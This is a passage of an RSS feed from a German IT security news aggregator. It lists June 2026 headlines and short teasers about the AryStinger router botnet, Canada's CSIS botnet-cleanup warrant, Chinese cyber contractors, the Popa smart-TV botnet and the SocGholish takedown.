<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-china-cyber-contractors-botnet-data-marketplace.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-china-cyber-contractors-botnet-data-marketplace.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-china-cyber-contractors-botnet-data-marketplace-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-china-cyber-contractors-botnet-data-marketplace-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-china-cyber-contractors-botnet-data-marketplace-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-china-cyber-contractors-botnet-data-marketplace-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-china-cyber-contractors-botnet-data-marketplace-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">Peking / LONDON (IT BOLTWISE) – Chinesische Cyberoperationen funktionieren zunehmend als kommerzielles Ökosystem: Private Firmen liefern Malware, Botnet-Zugänge und gestohlene Daten an staatliche Auftraggeber. Neue Analysen sprechen dabei von „composite responsibility“, weil eine Kampagne nicht mehr sauber einer einzigen APT-Bezeichnung zugeordnet werden kann. Ein Leck aus einem Umfeld, das mit Sicherheitsbehörden verknüpft ist, zeigt zudem, […]</p>
<div><a href="https://www.it-boltwise.de/kommerzielle-cyber-contractor-in-china-botnets-datenhandel-und-composite-responsibility.html">... den vollständigen Artikel <strong>»Kommerzielle Cyber-Contractor in China: Botnets, Datenhandel und Composite Responsibility«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/kommerzielle-cyber-contractor-in-china-botnets-datenhandel-und-composite-responsibility.html">Kommerzielle Cyber-Contractor in China: Botnets, Datenhandel und Composite Responsibility</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More]]></title>
<description><![CDATA[It’s Monday again.

This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.

The annoying part is how little of this feels new. Weak credentials, ...]]></description>
<link>https://tsecurity.de/de/3615453/it-security-nachrichten/weekly-recap-browser-bugs-edr-killers-tv-botnet-openbsd-flaw-android-trojan-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615453/it-security-nachrichten/weekly-recap-browser-bugs-edr-killers-tv-botnet-openbsd-flaw-android-trojan-and-more/</guid>
<pubDate>Mon, 22 Jun 2026 14:38:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It’s Monday again.

This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.

The annoying part is how little of this feels new. Weak credentials, sketchy downloads, browser extensions with too much access, and WordPress sites are used to push more]]></content:encoded>
</item>
<item>
<title><![CDATA[⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More]]></title>
<description><![CDATA[It’s Monday again. This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control. The annoying part is how little of…
Read more →
The post ⚡ Weekly Recap...]]></description>
<link>https://tsecurity.de/de/3615446/it-security-nachrichten/weekly-recap-browser-bugs-edr-killers-tv-botnet-openbsd-flaw-android-trojan-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615446/it-security-nachrichten/weekly-recap-browser-bugs-edr-killers-tv-botnet-openbsd-flaw-android-trojan-and-more/</guid>
<pubDate>Mon, 22 Jun 2026 14:38:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>It’s Monday again. This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control. The annoying part is how little of…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/%E2%9A%A1-weekly-recap-browser-bugs-edr-killers-tv-botnet-openbsd-flaw-android-trojan-and-more/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/%E2%9A%A1-weekly-recap-browser-bugs-edr-killers-tv-botnet-openbsd-flaw-android-trojan-and-more/">⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thousands of D-Link and QNAP NAS routers compromised by fast-moving AryStinger malware that turns unsecured devices into a malicious proxy botnet]]></title>
<description><![CDATA[More than 4,000 routers have been compromised so far, while the number of poisoned NAS devices remains unknown.]]></description>
<link>https://tsecurity.de/de/3615401/it-nachrichten/thousands-of-d-link-and-qnap-nas-routers-compromised-by-fast-moving-arystinger-malware-that-turns-unsecured-devices-into-a-malicious-proxy-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615401/it-nachrichten/thousands-of-d-link-and-qnap-nas-routers-compromised-by-fast-moving-arystinger-malware-that-turns-unsecured-devices-into-a-malicious-proxy-botnet/</guid>
<pubDate>Mon, 22 Jun 2026 14:18:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[More than 4,000 routers have been compromised so far, while the number of poisoned NAS devices remains unknown.]]></content:encoded>
</item>
<item>
<title><![CDATA[CSIS darf erstmals Botnet-Geräte in Kanada per Urteil neutralisieren]]></title>
<description><![CDATA[OTTAWA / LONDON (IT BOLTWISE) – Kanadas Geheimdienst CSIS hat per gerichtlicher Anordnung erstmals eine Botnet-Bereinigung durchgeführt, die auch Heimrouter, Server und IoT-Geräte direkt betrifft. Das Urteil erlaubt es dem Dienst, Botnet-Daten auf kompromittierten Systemen gezielt zu verändern, z...]]></description>
<link>https://tsecurity.de/de/3615350/it-security-nachrichten/csis-darf-erstmals-botnet-geraete-in-kanada-per-urteil-neutralisieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615350/it-security-nachrichten/csis-darf-erstmals-botnet-geraete-in-kanada-per-urteil-neutralisieren/</guid>
<pubDate>Mon, 22 Jun 2026 13:51:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-warrant-csis.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-warrant-csis.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-warrant-csis-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-warrant-csis-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-warrant-csis-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-warrant-csis-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-warrant-csis-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">OTTAWA / LONDON (IT BOLTWISE) – Kanadas Geheimdienst CSIS hat per gerichtlicher Anordnung erstmals eine Botnet-Bereinigung durchgeführt, die auch Heimrouter, Server und IoT-Geräte direkt betrifft. Das Urteil erlaubt es dem Dienst, Botnet-Daten auf kompromittierten Systemen gezielt zu verändern, zu schwächen oder zu löschen und die Geräte aus den Netzen zu lösen. Entscheidend ist dabei: Das […]</p>
<div><a href="https://www.it-boltwise.de/csis-darf-erstmals-botnet-geraete-in-kanada-per-urteil-neutralisieren.html">... den vollständigen Artikel <strong>»CSIS darf erstmals Botnet-Geräte in Kanada per Urteil neutralisieren«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/csis-darf-erstmals-botnet-geraete-in-kanada-per-urteil-neutralisieren.html">CSIS darf erstmals Botnet-Geräte in Kanada per Urteil neutralisieren</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger Botnet Uses Intranet Scanning and Traffic Tunneling to Hide Attacker Activity]]></title>
<description><![CDATA[A newly analyzed botnet family, AryStinger, weaponizes long‑neglected routers and NAS appliances to build a stealthy reconnaissance and relay infrastructure that helps attackers obscure origin and extend lateral reach. AryStinger leverages decade‑old vulnerabilities in RTL819X‑based routers and a...]]></description>
<link>https://tsecurity.de/de/3615169/it-security-nachrichten/arystinger-botnet-uses-intranet-scanning-and-traffic-tunneling-to-hide-attacker-activity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615169/it-security-nachrichten/arystinger-botnet-uses-intranet-scanning-and-traffic-tunneling-to-hide-attacker-activity/</guid>
<pubDate>Mon, 22 Jun 2026 12:39:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly analyzed botnet family, AryStinger, weaponizes long‑neglected routers and NAS appliances to build a stealthy reconnaissance and relay infrastructure that helps attackers obscure origin and extend lateral reach. AryStinger leverages decade‑old vulnerabilities in RTL819X‑based routers and a more feature‑rich…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/arystinger-botnet-uses-intranet-scanning-and-traffic-tunneling-to-hide-attacker-activity/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/arystinger-botnet-uses-intranet-scanning-and-traffic-tunneling-to-hide-attacker-activity/">AryStinger Botnet Uses Intranet Scanning and Traffic Tunneling to Hide Attacker Activity</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger Botnet Uses Intranet Scanning and Traffic Tunneling to Hide Attacker Activity]]></title>
<description><![CDATA[A newly analyzed botnet family, AryStinger, weaponizes long‑neglected routers and NAS appliances to build a stealthy reconnaissance and relay infrastructure that helps attackers obscure origin and extend lateral reach. AryStinger leverages decade‑old vulnerabilities in RTL819X‑based routers and a...]]></description>
<link>https://tsecurity.de/de/3615139/it-security-nachrichten/arystinger-botnet-uses-intranet-scanning-and-traffic-tunneling-to-hide-attacker-activity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615139/it-security-nachrichten/arystinger-botnet-uses-intranet-scanning-and-traffic-tunneling-to-hide-attacker-activity/</guid>
<pubDate>Mon, 22 Jun 2026 12:23:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly analyzed botnet family, AryStinger, weaponizes long‑neglected routers and NAS appliances to build a stealthy reconnaissance and relay infrastructure that helps attackers obscure origin and extend lateral reach. AryStinger leverages decade‑old vulnerabilities in RTL819X‑based routers and a more feature‑rich Go‑implemented “Standard” branch on NAS devices to perform distributed scanning, intranet discovery, and traffic tunneling […]</p>
<p>The post <a href="https://gbhackers.com/arystinger-botnet-uses-intranet-scanning/">AryStinger Botnet Uses Intranet Scanning and Traffic Tunneling to Hide Attacker Activity</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger: Recon-Proxys aus alten Routern – 4.300 Legacy-Geräte betroffen]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Eine neue Malware-Familie namens AryStinger macht alte Home-Router zu verteilten Recon- und Proxy-Knoten. Laut Sicherheitsforschung wurden bereits mindestens 4.300 Geräte infiziert, wobei die Zahl weiter steigen soll. Der Angriff setzt nicht auf den klassischen DDo...]]></description>
<link>https://tsecurity.de/de/3615134/it-security-nachrichten/arystinger-recon-proxys-aus-alten-routern-4300-legacy-geraete-betroffen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615134/it-security-nachrichten/arystinger-recon-proxys-aus-alten-routern-4300-legacy-geraete-betroffen/</guid>
<pubDate>Mon, 22 Jun 2026 12:23:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-arystinger-router-recon-proxy.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-arystinger-router-recon-proxy.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-arystinger-router-recon-proxy-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-arystinger-router-recon-proxy-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-arystinger-router-recon-proxy-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-arystinger-router-recon-proxy-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-arystinger-router-recon-proxy-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Eine neue Malware-Familie namens AryStinger macht alte Home-Router zu verteilten Recon- und Proxy-Knoten. Laut Sicherheitsforschung wurden bereits mindestens 4.300 Geräte infiziert, wobei die Zahl weiter steigen soll. Der Angriff setzt nicht auf den klassischen DDoS-Botnet-Ansatz, sondern auf die Vorbereitung von Einbrüchen: Fingerprinting, Subdomain-Enumeration, Traffic-Tunneling und Remote-Befehle laufen aus der […]</p>
<div><a href="https://www.it-boltwise.de/arystinger-recon-proxys-aus-alten-routern-4-300-legacy-geraete-betroffen.html">... den vollständigen Artikel <strong>»AryStinger: Recon-Proxys aus alten Routern – 4.300 Legacy-Geräte betroffen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/arystinger-recon-proxys-aus-alten-routern-4-300-legacy-geraete-betroffen.html">AryStinger: Recon-Proxys aus alten Routern – 4.300 Legacy-Geräte betroffen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Exploit 13-Year-Old Router Flaws to Deploy AryStinger Botnet]]></title>
<description><![CDATA[Threat actors are increasingly targeting outdated networking equipment to establish sophisticated reconnaissance networks. Security researchers recently uncovered an unusual attack campaign that exploits vulnerabilities disclosed over a decade ago to compromise older routers. Unlike typical botne...]]></description>
<link>https://tsecurity.de/de/3615093/it-security-nachrichten/hackers-exploit-13-year-old-router-flaws-to-deploy-arystinger-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615093/it-security-nachrichten/hackers-exploit-13-year-old-router-flaws-to-deploy-arystinger-botnet/</guid>
<pubDate>Mon, 22 Jun 2026 12:07:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Threat actors are increasingly targeting outdated networking equipment to establish sophisticated reconnaissance networks. Security researchers recently uncovered an unusual attack campaign that exploits vulnerabilities disclosed over a decade ago to compromise older routers. Unlike typical botnets designed for distributed denial-of-service attacks or cryptocurrency mining, this newly discovered malware family focuses heavily on intrusion reconnaissance. Named […]</p>
<p>The post <a href="https://cyberpress.org/arystinger-botnet-exploits-routers/">Hackers Exploit 13-Year-Old Router Flaws to Deploy AryStinger Botnet</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Canada’s Spy Agency Used First-of-Its-Kind Warrant to Clean Botnet-Infected Devices]]></title>
<description><![CDATA[Canada’s spy service got a judge’s permission to reach into infected servers, home routers, and IoT gear sitting on Canadian soil and neutralize two foreign-run botnets. The Federal Court released a public version of the ruling on June 15. It is…
Read more →
The post Canada’s Spy Agency Used Firs...]]></description>
<link>https://tsecurity.de/de/3615092/it-security-nachrichten/canadas-spy-agency-used-first-of-its-kind-warrant-to-clean-botnet-infected-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615092/it-security-nachrichten/canadas-spy-agency-used-first-of-its-kind-warrant-to-clean-botnet-infected-devices/</guid>
<pubDate>Mon, 22 Jun 2026 12:07:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Canada’s spy service got a judge’s permission to reach into infected servers, home routers, and IoT gear sitting on Canadian soil and neutralize two foreign-run botnets. The Federal Court released a public version of the ruling on June 15. It is…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/canadas-spy-agency-used-first-of-its-kind-warrant-to-clean-botnet-infected-devices/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/canadas-spy-agency-used-first-of-its-kind-warrant-to-clean-botnet-infected-devices/">Canada’s Spy Agency Used First-of-Its-Kind Warrant to Clean Botnet-Infected Devices</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-22 12h : 10 posts]]></title>
<description><![CDATA[10 posts were published in the last hour 10:4 : Gizmodo readers hit with ClickFix malware prompts after account compromise 10:4 : Fortinet Responds to FortiBleed Campaign 10:4 : Canada’s Spy Agency Used First-of-Its-Kind Warrant to Clean Botnet-Infected Devices 9:34…
Read more →
The post IT Secur...]]></description>
<link>https://tsecurity.de/de/3615088/it-security-nachrichten/it-security-news-hourly-summary-2026-06-22-12h-10-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615088/it-security-nachrichten/it-security-news-hourly-summary-2026-06-22-12h-10-posts/</guid>
<pubDate>Mon, 22 Jun 2026 12:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>10 posts were published in the last hour 10:4 : Gizmodo readers hit with ClickFix malware prompts after account compromise 10:4 : Fortinet Responds to FortiBleed Campaign 10:4 : Canada’s Spy Agency Used First-of-Its-Kind Warrant to Clean Botnet-Infected Devices 9:34…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-22-12h-10-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-22-12h-10-posts/">IT Security News Hourly Summary 2026-06-22 12h : 10 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Canada’s Spy Agency Used First-of-Its-Kind Warrant to Clean Botnet-Infected Devices]]></title>
<description><![CDATA[Canada's spy service got a judge's permission to reach into infected servers, home routers, and IoT gear sitting on Canadian soil and neutralize two foreign-run botnets.

The Federal Court released a public version of the ruling on June 15. It is the first time the Canadian Security Intelligence ...]]></description>
<link>https://tsecurity.de/de/3615020/it-security-nachrichten/canadas-spy-agency-used-first-of-its-kind-warrant-to-clean-botnet-infected-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615020/it-security-nachrichten/canadas-spy-agency-used-first-of-its-kind-warrant-to-clean-botnet-infected-devices/</guid>
<pubDate>Mon, 22 Jun 2026 11:38:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Canada's spy service got a judge's permission to reach into infected servers, home routers, and IoT gear sitting on Canadian soil and neutralize two foreign-run botnets.

The Federal Court released a public version of the ruling on June 15. It is the first time the Canadian Security Intelligence Service has used its threat reduction warrant powers this way.

The warrant let CSIS alter,]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger Malware Infects 4,300 Legacy Routers to Build Reconnaissance Proxy Network]]></title>
<description><![CDATA[A new malware family is turning forgotten home routers into a distributed reconnaissance and proxy network, not the DDoS botnet these devices usually end up in. QiAnXin's XLab calls it AryStinger and counts at least 4,300 infected routers, a total it says is still rising.

The distinction matters...]]></description>
<link>https://tsecurity.de/de/3614808/it-security-nachrichten/arystinger-malware-infects-4300-legacy-routers-to-build-reconnaissance-proxy-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614808/it-security-nachrichten/arystinger-malware-infects-4300-legacy-routers-to-build-reconnaissance-proxy-network/</guid>
<pubDate>Mon, 22 Jun 2026 09:54:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new malware family is turning forgotten home routers into a distributed reconnaissance and proxy network, not the DDoS botnet these devices usually end up in. QiAnXin's XLab calls it AryStinger and counts at least 4,300 infected routers, a total it says is still rising.

The distinction matters. AryStinger exists for the stage of an attack that comes before the break-in. Infected]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger Malware Infects 4,300 Legacy Routers to Build Reconnaissance Proxy Network]]></title>
<description><![CDATA[A new malware family is turning forgotten home routers into a distributed reconnaissance and proxy network, not the DDoS botnet these devices usually end up in. QiAnXin’s XLab calls it AryStinger and counts at least 4,300 infected routers, a total it says…
Read more →
The post AryStinger Malware ...]]></description>
<link>https://tsecurity.de/de/3614795/it-security-nachrichten/arystinger-malware-infects-4300-legacy-routers-to-build-reconnaissance-proxy-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614795/it-security-nachrichten/arystinger-malware-infects-4300-legacy-routers-to-build-reconnaissance-proxy-network/</guid>
<pubDate>Mon, 22 Jun 2026 09:53:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new malware family is turning forgotten home routers into a distributed reconnaissance and proxy network, not the DDoS botnet these devices usually end up in. QiAnXin’s XLab calls it AryStinger and counts at least 4,300 infected routers, a total it says…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/arystinger-malware-infects-4300-legacy-routers-to-build-reconnaissance-proxy-network/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/arystinger-malware-infects-4300-legacy-routers-to-build-reconnaissance-proxy-network/">AryStinger Malware Infects 4,300 Legacy Routers to Build Reconnaissance Proxy Network</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Popa-Botnet: Millionen Smart-TVs als Proxy-Knoten gekapert - Börse Express]]></title>
<description><![CDATA[... Cyberangriffen zu schützen. Gratis-E-Book: IT-Sicherheit jetzt stärken. Das Popa-Botnet: Wohnzimmer als Datenautobahn. Forensiker von Qurium ...]]></description>
<link>https://tsecurity.de/de/3614440/it-security-nachrichten/popa-botnet-millionen-smart-tvs-als-proxy-knoten-gekapert-boerse-express/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614440/it-security-nachrichten/popa-botnet-millionen-smart-tvs-als-proxy-knoten-gekapert-boerse-express/</guid>
<pubDate>Mon, 22 Jun 2026 05:53:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... Cyberangriffen zu schützen. Gratis-E-Book: <b>IT</b>-<b>Sicherheit</b> jetzt stärken. Das Popa-Botnet: Wohnzimmer als Datenautobahn. Forensiker von Qurium ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Popa-Botnet: Millionen Smart-TVs als Proxy-Knoten gekapert - Börse Express]]></title>
<description><![CDATA[Aktuelle Berichte aus Mitte Juni 2026 zeigen einen deutlichen Trend: Hacker kapern zunehmend Unterhaltungselektronik und Netzwerkhardware, um ...]]></description>
<link>https://tsecurity.de/de/3614379/hacking/popa-botnet-millionen-smart-tvs-als-proxy-knoten-gekapert-boerse-express/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614379/hacking/popa-botnet-millionen-smart-tvs-als-proxy-knoten-gekapert-boerse-express/</guid>
<pubDate>Mon, 22 Jun 2026 04:23:07 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktuelle Berichte aus Mitte Juni 2026 zeigen einen deutlichen Trend: <b>Hacker</b> kapern zunehmend Unterhaltungselektronik und Netzwerkhardware, um ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Stolen OAuth Tokens Hit Security Firms, AryStinger Router Botnet Emerges, AI Deepfake Cyberstalking]]></title>
<description><![CDATA[A breach at market intelligence platform Klue allowed attackers to steal OAuth tokens linking Clue to customers’ Salesforce environments, enabling quiet API-driven data extraction from firms including Huntress, Recorded Future, Tanium, and Jamf; Clue revoked tokens, removed the legacy integration...]]></description>
<link>https://tsecurity.de/de/3614351/it-security-nachrichten/stolen-oauth-tokens-hit-security-firms-arystinger-router-botnet-emerges-ai-deepfake-cyberstalking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614351/it-security-nachrichten/stolen-oauth-tokens-hit-security-firms-arystinger-router-botnet-emerges-ai-deepfake-cyberstalking/</guid>
<pubDate>Mon, 22 Jun 2026 03:53:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A breach at market intelligence platform Klue allowed attackers to steal OAuth tokens linking Clue to customers’ Salesforce environments, enabling quiet API-driven data extraction from firms including Huntress, Recorded Future, Tanium, and Jamf; Clue revoked tokens, removed the legacy integration…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/stolen-oauth-tokens-hit-security-firms-arystinger-router-botnet-emerges-ai-deepfake-cyberstalking/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/stolen-oauth-tokens-hit-security-firms-arystinger-router-botnet-emerges-ai-deepfake-cyberstalking/">Stolen OAuth Tokens Hit Security Firms, AryStinger Router Botnet Emerges, AI Deepfake Cyberstalking</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger botnet infected thousands of D-Link routers worldwide]]></title>
<description><![CDATA[A previously undocumented malware botnet named AryStinger has compromised more than 4,000 outdated routers to turn them into proxies for malicious traffic. [...]]]></description>
<link>https://tsecurity.de/de/3613731/it-security-nachrichten/arystinger-botnet-infected-thousands-of-d-link-routers-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613731/it-security-nachrichten/arystinger-botnet-infected-thousands-of-d-link-routers-worldwide/</guid>
<pubDate>Sun, 21 Jun 2026 16:39:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A previously undocumented malware botnet named AryStinger has compromised more than 4,000 outdated routers to turn them into proxies for malicious traffic. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Endgame schaltet SocGholish Malware-Infrastruktur ab]]></title>
<description><![CDATA[Internationale Ermittler haben fast 15.000 infizierte WordPress-Blogs von der Malware "SocGholish" bereinigt und die zugrunde liegende Botnet-Infrastrukturen vom Netz genommen. Das kriminelle Netzwerk wurde von der in Russland angesiedelten Cyber-Kriminellengruppe "Evil Corp" betrieben. Die Infor...]]></description>
<link>https://tsecurity.de/de/3612806/it-nachrichten/operation-endgame-schaltet-socgholish-malware-infrastruktur-ab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612806/it-nachrichten/operation-endgame-schaltet-socgholish-malware-infrastruktur-ab/</guid>
<pubDate>Sun, 21 Jun 2026 00:02:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Internationale Ermittler haben fast 15.000 infizierte WordPress-Blogs von der Malware "SocGholish" bereinigt und die zugrunde liegende Botnet-Infrastrukturen vom Netz genommen. Das kriminelle Netzwerk wurde von der in Russland angesiedelten Cyber-Kriminellengruppe "Evil Corp" betrieben. Die Information ist mir die Tage in … <a href="https://borncity.com/blog/2026/06/20/operation-endgame-schaltet-socgholish-malware-infrastruktur-ab/">Weiterlesen <span class="meta-nav">→</span></a>
<p><a href="https://borncity.com/blog/2026/06/20/operation-endgame-schaltet-socgholish-malware-infrastruktur-ab/" rel="nofollow">Quelle</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[In Other News: Apple Patches Beats Eavesdropping Flaw, DOT Closes Delta CrowdStrike Probe, AWS Continuum]]></title>
<description><![CDATA[Other noteworthy stories that might have slipped under the radar: Android TV botnet Popa linked to Israeli firm, Velvet Ant maintained decade-long stealth, unpatched GCP Config Connector flaw enables takeover.
The post In Other News: Apple Patches Beats Eavesdropping Flaw, DOT Closes Delta CrowdS...]]></description>
<link>https://tsecurity.de/de/3610789/it-security-nachrichten/in-other-news-apple-patches-beats-eavesdropping-flaw-dot-closes-delta-crowdstrike-probe-aws-continuum/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610789/it-security-nachrichten/in-other-news-apple-patches-beats-eavesdropping-flaw-dot-closes-delta-crowdstrike-probe-aws-continuum/</guid>
<pubDate>Fri, 19 Jun 2026 17:40:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
